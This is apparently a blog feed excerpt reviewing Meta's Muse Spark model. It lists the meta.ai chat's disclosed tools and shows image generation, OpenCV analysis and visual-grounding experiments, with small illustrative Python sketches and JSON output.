&lt;p&gt;[...] It really is simultaneously the case that OpenAI's free and I think slightly orphaned (?) "Advanced Voice Mode" will fumble the dumbest questions in your Instagram's reels and &lt;em&gt;at the same time&lt;/em&gt;, OpenAI's highest-tier and paid Codex model will go off for 1 hour to coherently restructure an entire code base, or find and exploit vulnerabilities in computer systems.&lt;/p&gt;
&lt;p&gt;This part really works and has made dramatic strides because 2 properties:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;these domains offer explicit reward functions that are verifiable meaning they are easily amenable to reinforcement learning training (e.g. unit tests passed yes or no, in contrast to writing, which is much harder to explicitly judge),  but also&lt;/li&gt;
&lt;li&gt;they are a lot more valuable in b2b settings, meaning that the biggest fraction of the team is focused on improving them.&lt;/li&gt;
&lt;/ol&gt;
&lt;/blockquote&gt;

    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/andrej-karpathy"&gt;andrej-karpathy&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/openai"&gt;openai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/chatgpt"&gt;chatgpt&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;&lt;/p&gt;



</summary><category term="andrej-karpathy"/><category term="generative-ai"/><category term="openai"/><category term="chatgpt"/><category term="ai"/><category term="llms"/></entry><entry><title>Meta's new model is Muse Spark, and meta.ai chat has some interesting tools</title><link href="https://simonwillison.net/2026/Apr/8/muse-spark/#atom-tag" rel="alternate"/><published>2026-04-08T23:07:44+00:00</published><updated>2026-04-08T23:07:44+00:00</updated><id>https://simonwillison.net/2026/Apr/8/muse-spark/#atom-tag</id><summary type="html">
    &lt;p&gt;Meta &lt;a href="https://ai.meta.com/blog/introducing-muse-spark-msl/"&gt;announced Muse Spark&lt;/a&gt; today, their first model release since Llama 4 &lt;a href="https://simonwillison.net/2025/Apr/5/llama-4-notes/"&gt;almost exactly a year ago&lt;/a&gt;. It's hosted, not open weights, and the API is currently "a private API preview to select users", but you can try it out today on &lt;a href="https://meta.ai/"&gt;meta.ai&lt;/a&gt; (Facebook or Instagram login required).&lt;/p&gt;
&lt;p&gt;Meta's self-reported benchmarks show it as competitive with Opus 4.6, Gemini 3.1 Pro, and GPT 5.4 on selected benchmarks, though notably behind on Terminal-Bench 2.0. Meta themselves say they "continue to invest in areas with current performance gaps, such as long-horizon agentic systems and coding workflows".&lt;/p&gt;
&lt;p&gt;The model is exposed as two different modes on &lt;a href="https://meta.ai/"&gt;meta.ai&lt;/a&gt; - "Instant" and "Thinking". Meta promise a "Contemplating" mode in the future which they say will offer much longer reasoning time and should behave more like Gemini Deep Think or GPT-5.4 Pro.&lt;/p&gt;
&lt;h5 id="a-couple-of-pelicans"&gt;A couple of pelicans&lt;/h5&gt;
&lt;p&gt;I prefer to run &lt;a href="https://simonwillison.net/tags/pelican-riding-a-bicycle/"&gt;my pelican test&lt;/a&gt; via API to avoid being influenced by any invisible system prompts, but since that's not an option I ran it against the chat UI directly.&lt;/p&gt;
&lt;p&gt;Here's the pelican I got for "Instant":&lt;/p&gt;
&lt;p&gt;&lt;img src="https://static.simonwillison.net/static/2026/muse-spark-instant-pelican.jpg" alt="This is a pretty basic pelican. The bicycle is mangled, the pelican itself has a rectangular beak albeit with a hint of pouch curve below it. Not a very good one." style="max-width: 100%;" /&gt;&lt;/p&gt;
&lt;p&gt;And this one for "Thinking":&lt;/p&gt;
&lt;p&gt;&lt;img src="https://static.simonwillison.net/static/2026/muse-spark-thinking-pelican.png" alt="Much better. Clearly a pelican. Bicycle is the correct shape. Pelican is wearing a blue cycling helmet (albeit badly rendered). Not a bad job at all." style="max-width: 100%;" /&gt;&lt;/p&gt;
&lt;p&gt;Both SVGs were rendered inline by the Meta AI interface. Interestingly, the Instant model &lt;a href="https://gist.github.com/simonw/ea7466204f1001b7d67afcb5d0532f6f"&gt;output an SVG directly&lt;/a&gt; (with code comments) whereas the Thinking model &lt;a href="https://gist.github.com/simonw/bc911a56006ba44b0bf66abf0f872ab2"&gt;wrapped it in a thin HTML shell&lt;/a&gt; with some unused &lt;code&gt;Playables SDK v1.0.0&lt;/code&gt; JavaScript libraries.&lt;/p&gt;
&lt;p&gt;Which got me curious...&lt;/p&gt;
&lt;h5 id="poking-around-with-tools"&gt;Poking around with tools&lt;/h5&gt;
&lt;p&gt;Clearly Meta's chat harness has some tools wired up to it - at the very least it can render SVG and HTML as embedded frames, Claude Artifacts style.&lt;/p&gt;
&lt;p&gt;But what else can it do?&lt;/p&gt;
&lt;p&gt;I asked it:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;what tools do you have access to?&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;And then:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;I want the exact tool names, parameter names and tool descriptions, in the original format&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;It spat out detailed descriptions of 16 different tools. You can see &lt;a href="https://gist.github.com/simonw/e1ce0acd70443f93dcd6481e716c4304#response-1"&gt;the full list I got back here&lt;/a&gt; - credit to Meta for not telling their bot to hide these, since it's far less frustrating if I can get them out without having to mess around with jailbreaks.&lt;/p&gt;
&lt;p&gt;Here are highlights derived from that response:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Browse and search&lt;/strong&gt;. &lt;code&gt;browser.search&lt;/code&gt; can run a web search through an undisclosed search engine, &lt;code&gt;browser.open&lt;/code&gt; can load the full page from one of those search results and &lt;code&gt;browser.find&lt;/code&gt; can run pattern matches against the returned page content.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Meta content search&lt;/strong&gt;. &lt;code&gt;meta_1p.content_search&lt;/code&gt; can run "Semantic search across Instagram, Threads, and Facebook posts" - but only for posts the user has access to view which were created since 2025-01-01. This tool has some powerful looking parameters, including &lt;code&gt;author_ids&lt;/code&gt;, &lt;code&gt;key_celebrities&lt;/code&gt;, &lt;code&gt;commented_by_user_ids&lt;/code&gt;, and &lt;code&gt;liked_by_user_ids&lt;/code&gt;.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;"Catalog search"&lt;/strong&gt; - &lt;code&gt;meta_1p.meta_catalog_search&lt;/code&gt; can "Search for products in Meta's product catalog", presumably for the "Shopping" option in the Meta AI model selector.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Image generation&lt;/strong&gt;. &lt;code&gt;media.image_gen&lt;/code&gt; generates images from prompts, and "returns a CDN URL and saves the image to the sandbox". It has modes "artistic" and "realistic" and can return "square", "vertical" or "landscape" images.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;container.python_execution&lt;/strong&gt; - yes! It's &lt;a href="https://simonwillison.net/tags/code-interpreter/"&gt;Code Interpreter&lt;/a&gt;, my favourite feature of both ChatGPT and Claude.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Execute Python code in a remote sandbox environment. Python 3.9 with pandas, numpy, matplotlib, plotly, scikit-learn, PyMuPDF, Pillow, OpenCV, etc. Files persist at &lt;code&gt;/mnt/data/&lt;/code&gt;.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Python 3.9 &lt;a href="https://devguide.python.org/versions/"&gt;is EOL&lt;/a&gt; these days but the library collection looks useful.&lt;/p&gt;
&lt;p&gt;I prompted "use python code to confirm sqlite version and python version" and got back Python 3.9.25 and SQLite 3.34.1 (from &lt;a href="https://sqlite.org/releaselog/3_34_1.html"&gt;January 2021&lt;/a&gt;).&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;container.create_web_artifact&lt;/strong&gt; - we saw this earlier with the HTML wrapper around the pelican: Meta AI can create HTML+JavaScript files in its container which can then be served up as secure sandboxed iframe interactives. "Set kind to &lt;code&gt;html&lt;/code&gt; for websites/apps or &lt;code&gt;svg&lt;/code&gt; for vector graphics."&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;container.download_meta_1p_media&lt;/strong&gt; is interesting: "Download media from Meta 1P sources into the sandbox. Use post_id for Instagram/Facebook/Threads posts, or &lt;code&gt;catalog_search_citation_id&lt;/code&gt; for catalog product images". So it looks like you can pull in content from other parts of Meta and then do fun Code Interpreter things to it in the sandbox.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;container.file_search&lt;/strong&gt; - "Search uploaded files in this conversation and return relevant excerpts" - I guess for digging through PDFs and similar?&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Tools for editing files in the container&lt;/strong&gt; - &lt;code&gt;container.view&lt;/code&gt;, &lt;code&gt;container.insert&lt;/code&gt; (with &lt;code&gt;new_str&lt;/code&gt; and &lt;code&gt;insert_line&lt;/code&gt;), &lt;code&gt;container.str_replace&lt;/code&gt;. These look similar to Claude's &lt;a href="https://platform.claude.com/docs/en/agents-and-tools/tool-use/text-editor-tool#text-editor-tool-commands"&gt;text editor tool commands&lt;/a&gt;, a pattern that is becoming common across file-equipped agent harnesses.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;container.visual_grounding&lt;/strong&gt; - see below, this one is &lt;em&gt;fun&lt;/em&gt;.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;subagents.spawn_agent&lt;/strong&gt; - the &lt;a href="https://simonwillison.net/guides/agentic-engineering-patterns/subagents/"&gt;sub-agent as a tool&lt;/a&gt; pattern. "Spawn an independent sub-agent for research, analysis, or delegation. It returns its final text response."&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;third_party.link_third_party_account&lt;/strong&gt; - "Initiate account linking for a third-party service", currently Google Calendar, Outlook Calendar, Gmail, or Outlook.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
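&lt;p&gt;Those editor commands describe a very small contract. Here's a minimal Python sketch of how a harness might implement them - the function names and parameters mirror the tool names above, but the behavior is my guess, not Meta's actual implementation:&lt;/p&gt;

```python
# Hypothetical sketch of the container.view / insert / str_replace
# editor commands. Parameter names (new_str, insert_line) come from
# the tool dump above; the exact semantics are an assumption.

def view(lines, start=1, end=None):
    """Return numbered lines, roughly what container.view might show."""
    end = end or len(lines)
    return [f"{i}: {line}" for i, line in enumerate(lines[start - 1:end], start)]

def insert(lines, insert_line, new_str):
    """Insert new_str after line number insert_line (container.insert)."""
    return lines[:insert_line] + [new_str] + lines[insert_line:]

def str_replace(lines, old_str, new_str):
    """Replace a unique occurrence of old_str (container.str_replace)."""
    text = "\n".join(lines)
    if text.count(old_str) != 1:
        raise ValueError("old_str must match exactly once")
    return text.replace(old_str, new_str).split("\n")

doc = ["def hello():", "    print('hi')"]
doc = insert(doc, 2, "    return True")
doc = str_replace(doc, "print('hi')", "print('hello')")
```

&lt;p&gt;Requiring &lt;code&gt;old_str&lt;/code&gt; to match exactly once is how Claude's version avoids ambiguous edits, and I'd expect Meta's to do something similar.&lt;/p&gt;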
&lt;h4 id="image-analysis-in-the-container"&gt;Image analysis in the container&lt;/h4&gt;
&lt;p&gt;Let's talk about that &lt;code&gt;container.visual_grounding&lt;/code&gt; one. Here's the description in full:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Description:&lt;/strong&gt; Visual grounding tool that analyzes the image, identifies and labels objects, locates regions, or counts objects.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Parameters:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;object_names&lt;/strong&gt; (array, required)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;image_path&lt;/strong&gt; (string, default "")&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;format_type&lt;/strong&gt; ("bbox"|"point"|"count"|null, default "bbox")&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;title&lt;/strong&gt; (string|null)&lt;/li&gt;
&lt;/ul&gt;
&lt;/blockquote&gt;
&lt;p&gt;So it takes a required list of object names, an optional image path, and returns results in &lt;code&gt;bbox&lt;/code&gt;, &lt;code&gt;point&lt;/code&gt; or &lt;code&gt;count&lt;/code&gt; format.&lt;/p&gt;
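&lt;p&gt;Based purely on that parameter list, a call to the tool might look something like this - the schema here is inferred from the dump above, not documented anywhere:&lt;/p&gt;

```python
# Inferred payload builder for container.visual_grounding, based
# only on the leaked parameter list - not an official schema.

VALID_FORMATS = {"bbox", "point", "count", None}

def build_grounding_call(object_names, image_path="", format_type="bbox", title=None):
    if not object_names:
        raise ValueError("object_names is required")
    if format_type not in VALID_FORMATS:
        raise ValueError("format_type must be bbox, point, count or None")
    return {
        "object_names": list(object_names),
        "image_path": image_path,
        "format_type": format_type,
        "title": title,
    }

call = build_grounding_call(["coffee cup", "banana peel"], "/mnt/data/raccoon.jpg")
```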
&lt;p&gt;This sounded to me like Meta's &lt;a href="https://github.com/facebookresearch/segment-anything"&gt;Segment Anything&lt;/a&gt; (&lt;em&gt;I later heard that it's not: it's a native capability of the model itself, exposed via a tool call with a custom system prompt&lt;/em&gt;). I decided to take it for a spin.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Prompt&lt;/strong&gt;:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;generate a photo of a raccoon sitting on a trash can wearing trash as a hat&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;&lt;strong&gt;Response&lt;/strong&gt;:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Here you go — king of the alley, in full regalia:&lt;/p&gt;
&lt;p&gt;&lt;img src="https://static.simonwillison.net/static/2026/meta-raccoon-trash-hat.jpg" alt="It's a photo of a raccoon wearing a disposable coffee cup and some newspaper and banana peel as a hat. It's pretty good" style="max-width: 100%;" /&gt;&lt;/p&gt;
&lt;p&gt;Coffee cup crown, banana peel brim, newspaper feather. Peak raccoon fashion. Want me to make a wilder version — maybe night-vision, or wearing sunglasses too?&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;My guess is that image generation in Meta AI is powered by their &lt;a href="https://arxiv.org/abs/2309.15807"&gt;Emu model&lt;/a&gt;, or an updated version of it. This is the same pattern as ChatGPT and Gemini image generation, where images are generated by a tool call (here that's &lt;code&gt;media.image_gen&lt;/code&gt;).&lt;/p&gt;
&lt;p&gt;The &lt;code&gt;image_gen&lt;/code&gt; tool description said that it "saves the image to the sandbox", so my guess was that I'd then be able to run Python code against it. I tried:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;use python OpenCV to analyze that image and find out neat things about it&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Annoyingly it did &lt;em&gt;not&lt;/em&gt; show me the code it ran, but it did create this image:&lt;/p&gt;
&lt;p&gt;&lt;img src="https://static.simonwillison.net/static/2026/raccoon_analysis.png" alt="OpenCV image analysis dashboard titled &amp;quot;OpenCV Analysis: Raccoon Trash Hat&amp;quot; with four panels: top-left shows the original 1280x1280 photo of a raccoon wearing a trash-lid hat with a coffee cup and newspaper on top in an alley; top-right shows a Canny edge detection version with white edges on black background labeled &amp;quot;Canny Edges - 4.6% density&amp;quot;; bottom-left shows &amp;quot;Top 5 Dominant Colors&amp;quot; as swatches with values RGB(20, 19, 24): 35.3%, RGB(43, 43, 47): 34.2%, RGB(84, 80, 79): 18.3%, RGB(139, 135, 131): 6.3%, RGB(210, 213, 208): 5.8%; bottom-right shows &amp;quot;Color Histograms&amp;quot; line chart with Red, Green, and Blue channels plotted from 0-250 on x-axis and 0-35000 on y-axis, peaking around value 25-50." style="max-width: 100%;" /&gt;&lt;/p&gt;
&lt;p&gt;Pretty neat! We can generate images and then run Python tools against them in the same sandbox.&lt;/p&gt;
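&lt;p&gt;The "Top 5 Dominant Colors" panel in that dashboard is the kind of thing a few lines of Python can reproduce. Here's a stdlib-only approximation operating on raw RGB tuples - the sandbox presumably used OpenCV and k-means, and the quantization bucket size here is my own choice:&lt;/p&gt;

```python
# Approximate a "dominant colors" panel without OpenCV: quantize
# each pixel to a coarse grid, then count the buckets. A stdlib
# sketch - the real sandbox likely used cv2 and k-means.
from collections import Counter

def dominant_colors(pixels, bucket=32, top=5):
    """pixels: iterable of (r, g, b) tuples. Returns [(rgb, share), ...]."""
    quantized = Counter(
        tuple((c // bucket) * bucket for c in px) for px in pixels
    )
    total = sum(quantized.values())
    return [(rgb, count / total) for rgb, count in quantized.most_common(top)]

# A tiny synthetic "image": mostly dark alley, some newspaper grey.
pixels = [(20, 19, 24)] * 70 + [(210, 213, 208)] * 30
colors = dominant_colors(pixels)
```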
&lt;p&gt;Next, the &lt;code&gt;visual_grounding&lt;/code&gt; tool. Knowing the names of the tools makes it easy to refer to them in prompts:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Now try the container.visual_grounding tool&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The response (&lt;a href="https://gist.github.com/simonw/72d64b325d33e5882b9818d825551b44"&gt;full response here&lt;/a&gt;):&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Done — visual_grounding pinpointed every piece of the outfit with pixel-level precision:&lt;/p&gt;
&lt;p&gt;&lt;img src="https://static.simonwillison.net/static/2026/meta-grounding.jpg" alt="Visual grounding analysis of a raccoon photo titled &amp;quot;Visual Grounding: Found 8 objects&amp;quot; with colored dot annotations on the image marking each detected object: coffee cup (515,205) in yellow, banana peel (569,261) in light yellow, newspaper (399,279) in blue, right eye (461,396) in magenta, left eye (582,397) in pink, nose (514,472) in cyan, raccoon (553,548) in green, and trash can lid (550,892) in red. A legend at the bottom lists all objects with their normalized 0-1000 coordinates. Footer text reads &amp;quot;Coordinates are 0-1000 normalized. visual_grounding returned precise points for each component of the trash hat ensemble.&amp;quot; Watermark reads &amp;quot;Meta AI&amp;quot;." style="max-width: 100%;" /&gt;&lt;/p&gt;
&lt;p&gt;[...]&lt;/p&gt;
&lt;p&gt;Want me to run it in bbox mode next to draw boxes around the fur texture, or count mode to see how many individual whiskers it can detect?&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Once again, Meta AI wrapped the results from the tool in a custom HTML visualization. That's clearly &lt;code&gt;point&lt;/code&gt; mode, but how about the others?&lt;/p&gt;
&lt;p&gt;I prompted:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;yes draw bounding boxes, can it do masks too?&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Response:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Yes — bounding boxes work great. Masks? Not directly in &lt;code&gt;visual_grounding&lt;/code&gt;; it only returns three formats: point, bbox, and count. No pixel-level segmentation masks.&lt;/p&gt;
&lt;p&gt;Here's the bbox output:&lt;/p&gt;
&lt;p&gt;&lt;img src="https://static.simonwillison.net/static/2026/meta-bbox.jpg" alt="Bounding box object detection visualization titled &amp;quot;Bounding Boxes (visual_grounding)&amp;quot; with subtitle &amp;quot;8 objects detected — coordinates are 0-1000 normalized&amp;quot; showing a raccoon photo with colored rectangular bounding boxes around detected objects: coffee cup in yellow [424,115,610,273] 186×158, banana peel in yellow [472,215,667,291] 195×76, newspaper in blue [305,223,548,315] 243×92, raccoon in green [270,240,892,845] 622×605, raccoon's face in purple [305,283,750,537] 445×254, right eye in magenta [442,379,489,413] 47×34, left eye in magenta [565,379,605,416] 40×37, and trash can lid in red [107,800,1000,998] 893×198. A legend at the bottom shows each object's name, coordinates, and pixel dimensions in colored cards. Watermark reads &amp;quot;Meta AI&amp;quot;." style="max-width: 100%;" /&gt;&lt;/p&gt;
&lt;p&gt;What you’re seeing:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;raccoon&lt;/strong&gt;: big box from (270,240) to (892,845) — covers 62% of the width, basically the whole animal&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;coffee cup&lt;/strong&gt;: (424,115)-(610,273) — sits highest, 158px tall in the 0-1000 space&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;banana peel&lt;/strong&gt;: (472,215)-(667,291) — overlaps the cup's base, confirming it's draped over the side&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;newspaper&lt;/strong&gt;: (305,223)-(548,315) — left ear coverage&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;trash can lid&lt;/strong&gt;: (107,800)-(1000,998) — spans almost the full image width at the bottom&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;face&lt;/strong&gt;: (305,283)-(750,537) — tight crop around the mask&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;eyes&lt;/strong&gt;: both ~40×37 pixel boxes, perfectly level at y=379&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Notice how the boxes nest: face is inside raccoon, eyes inside face, hat pieces overlap each other but stay above the face box. The tool is doing real object localization, not just guessing centers.&lt;/p&gt;
&lt;hr /&gt;
&lt;p&gt;&lt;strong&gt;About masks:&lt;/strong&gt; since visual_grounding doesn't output them, I can fake them with OpenCV in the container. Two quick options:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;GrabCut&lt;/strong&gt; — I give it the raccoon bbox, it iteratively segments fur from background and returns a binary mask&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;SAM-style color threshold&lt;/strong&gt; — use the bbox plus k-means to isolate the coffee cup or banana peel&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Want me to generate an actual alpha mask for the raccoon (cut it out from the alley), or for the trash hat pieces separately? Takes about 10 seconds and I can give you a transparent PNG.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Here's &lt;a href="https://static.simonwillison.net/static/2026/meta-bbox.html"&gt;the HTML for that bbox visualization&lt;/a&gt;.&lt;/p&gt;
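&lt;p&gt;Those 0-1000 normalized coordinates need converting back to pixels before you can crop or annotate the original image. The conversion is trivial but easy to get subtly wrong; here's the sketch I'd use, plugging in the 1280x1280 size reported by the earlier OpenCV dashboard:&lt;/p&gt;

```python
# Convert visual_grounding's 0-1000 normalized bbox coordinates
# into pixel coordinates for a given image size.

def denormalize_bbox(bbox, width, height):
    """bbox: (x0, y0, x1, y1) in 0-1000 space -> pixel ints."""
    x0, y0, x1, y1 = bbox
    return (
        round(x0 * width / 1000), round(y0 * height / 1000),
        round(x1 * width / 1000), round(y1 * height / 1000),
    )

# The raccoon bbox from the visualization, on the 1280x1280 image:
print(denormalize_bbox((270, 240, 892, 845), 1280, 1280))
```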
&lt;p&gt;Finally I had it dump out the raw JSON for point mode, bbox mode and count mode. You can &lt;a href="https://gist.github.com/simonw/26bfdb22d7d73450c13f49abbf0c251a"&gt;see that all here&lt;/a&gt;. The count mode is particularly interesting - here's that in full:&lt;/p&gt;
&lt;div class="highlight highlight-source-json"&gt;&lt;pre&gt;[
  {
    &lt;span class="pl-ent"&gt;"object_name"&lt;/span&gt;: &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;raccoon whisker&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt;,
    &lt;span class="pl-ent"&gt;"points"&lt;/span&gt;: [
      {&lt;span class="pl-ent"&gt;"x"&lt;/span&gt;: &lt;span class="pl-c1"&gt;403&lt;/span&gt;, &lt;span class="pl-ent"&gt;"y"&lt;/span&gt;: &lt;span class="pl-c1"&gt;445&lt;/span&gt;},
      {&lt;span class="pl-ent"&gt;"x"&lt;/span&gt;: &lt;span class="pl-c1"&gt;397&lt;/span&gt;, &lt;span class="pl-ent"&gt;"y"&lt;/span&gt;: &lt;span class="pl-c1"&gt;458&lt;/span&gt;},
      {&lt;span class="pl-ent"&gt;"x"&lt;/span&gt;: &lt;span class="pl-c1"&gt;392&lt;/span&gt;, &lt;span class="pl-ent"&gt;"y"&lt;/span&gt;: &lt;span class="pl-c1"&gt;472&lt;/span&gt;},
      {&lt;span class="pl-ent"&gt;"x"&lt;/span&gt;: &lt;span class="pl-c1"&gt;391&lt;/span&gt;, &lt;span class="pl-ent"&gt;"y"&lt;/span&gt;: &lt;span class="pl-c1"&gt;485&lt;/span&gt;},
      {&lt;span class="pl-ent"&gt;"x"&lt;/span&gt;: &lt;span class="pl-c1"&gt;398&lt;/span&gt;, &lt;span class="pl-ent"&gt;"y"&lt;/span&gt;: &lt;span class="pl-c1"&gt;497&lt;/span&gt;},
      {&lt;span class="pl-ent"&gt;"x"&lt;/span&gt;: &lt;span class="pl-c1"&gt;415&lt;/span&gt;, &lt;span class="pl-ent"&gt;"y"&lt;/span&gt;: &lt;span class="pl-c1"&gt;512&lt;/span&gt;},
      {&lt;span class="pl-ent"&gt;"x"&lt;/span&gt;: &lt;span class="pl-c1"&gt;618&lt;/span&gt;, &lt;span class="pl-ent"&gt;"y"&lt;/span&gt;: &lt;span class="pl-c1"&gt;446&lt;/span&gt;},
      {&lt;span class="pl-ent"&gt;"x"&lt;/span&gt;: &lt;span class="pl-c1"&gt;622&lt;/span&gt;, &lt;span class="pl-ent"&gt;"y"&lt;/span&gt;: &lt;span class="pl-c1"&gt;461&lt;/span&gt;},
      {&lt;span class="pl-ent"&gt;"x"&lt;/span&gt;: &lt;span class="pl-c1"&gt;625&lt;/span&gt;, &lt;span class="pl-ent"&gt;"y"&lt;/span&gt;: &lt;span class="pl-c1"&gt;475&lt;/span&gt;},
      {&lt;span class="pl-ent"&gt;"x"&lt;/span&gt;: &lt;span class="pl-c1"&gt;628&lt;/span&gt;, &lt;span class="pl-ent"&gt;"y"&lt;/span&gt;: &lt;span class="pl-c1"&gt;488&lt;/span&gt;},
      {&lt;span class="pl-ent"&gt;"x"&lt;/span&gt;: &lt;span class="pl-c1"&gt;635&lt;/span&gt;, &lt;span class="pl-ent"&gt;"y"&lt;/span&gt;: &lt;span class="pl-c1"&gt;501&lt;/span&gt;},
      {&lt;span class="pl-ent"&gt;"x"&lt;/span&gt;: &lt;span class="pl-c1"&gt;651&lt;/span&gt;, &lt;span class="pl-ent"&gt;"y"&lt;/span&gt;: &lt;span class="pl-c1"&gt;518&lt;/span&gt;}
    ],
    &lt;span class="pl-ent"&gt;"count"&lt;/span&gt;: &lt;span class="pl-c1"&gt;12&lt;/span&gt;
  },
  {
    &lt;span class="pl-ent"&gt;"object_name"&lt;/span&gt;: &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;raccoon paw claw&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt;,
    &lt;span class="pl-ent"&gt;"points"&lt;/span&gt;: [
      {&lt;span class="pl-ent"&gt;"x"&lt;/span&gt;: &lt;span class="pl-c1"&gt;406&lt;/span&gt;, &lt;span class="pl-ent"&gt;"y"&lt;/span&gt;: &lt;span class="pl-c1"&gt;845&lt;/span&gt;},
      {&lt;span class="pl-ent"&gt;"x"&lt;/span&gt;: &lt;span class="pl-c1"&gt;424&lt;/span&gt;, &lt;span class="pl-ent"&gt;"y"&lt;/span&gt;: &lt;span class="pl-c1"&gt;847&lt;/span&gt;},
      {&lt;span class="pl-ent"&gt;"x"&lt;/span&gt;: &lt;span class="pl-c1"&gt;441&lt;/span&gt;, &lt;span class="pl-ent"&gt;"y"&lt;/span&gt;: &lt;span class="pl-c1"&gt;842&lt;/span&gt;},
      {&lt;span class="pl-ent"&gt;"x"&lt;/span&gt;: &lt;span class="pl-c1"&gt;473&lt;/span&gt;, &lt;span class="pl-ent"&gt;"y"&lt;/span&gt;: &lt;span class="pl-c1"&gt;833&lt;/span&gt;},
      {&lt;span class="pl-ent"&gt;"x"&lt;/span&gt;: &lt;span class="pl-c1"&gt;596&lt;/span&gt;, &lt;span class="pl-ent"&gt;"y"&lt;/span&gt;: &lt;span class="pl-c1"&gt;830&lt;/span&gt;},
      {&lt;span class="pl-ent"&gt;"x"&lt;/span&gt;: &lt;span class="pl-c1"&gt;635&lt;/span&gt;, &lt;span class="pl-ent"&gt;"y"&lt;/span&gt;: &lt;span class="pl-c1"&gt;844&lt;/span&gt;},
      {&lt;span class="pl-ent"&gt;"x"&lt;/span&gt;: &lt;span class="pl-c1"&gt;660&lt;/span&gt;, &lt;span class="pl-ent"&gt;"y"&lt;/span&gt;: &lt;span class="pl-c1"&gt;843&lt;/span&gt;},
      {&lt;span class="pl-ent"&gt;"x"&lt;/span&gt;: &lt;span class="pl-c1"&gt;679&lt;/span&gt;, &lt;span class="pl-ent"&gt;"y"&lt;/span&gt;: &lt;span class="pl-c1"&gt;838&lt;/span&gt;}
    ],
    &lt;span class="pl-ent"&gt;"count"&lt;/span&gt;: &lt;span class="pl-c1"&gt;8&lt;/span&gt;
  },
  {
    &lt;span class="pl-ent"&gt;"object_name"&lt;/span&gt;: &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;trash item on head&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt;,
    &lt;span class="pl-ent"&gt;"points"&lt;/span&gt;: [
      {&lt;span class="pl-ent"&gt;"x"&lt;/span&gt;: &lt;span class="pl-c1"&gt;514&lt;/span&gt;, &lt;span class="pl-ent"&gt;"y"&lt;/span&gt;: &lt;span class="pl-c1"&gt;191&lt;/span&gt;},
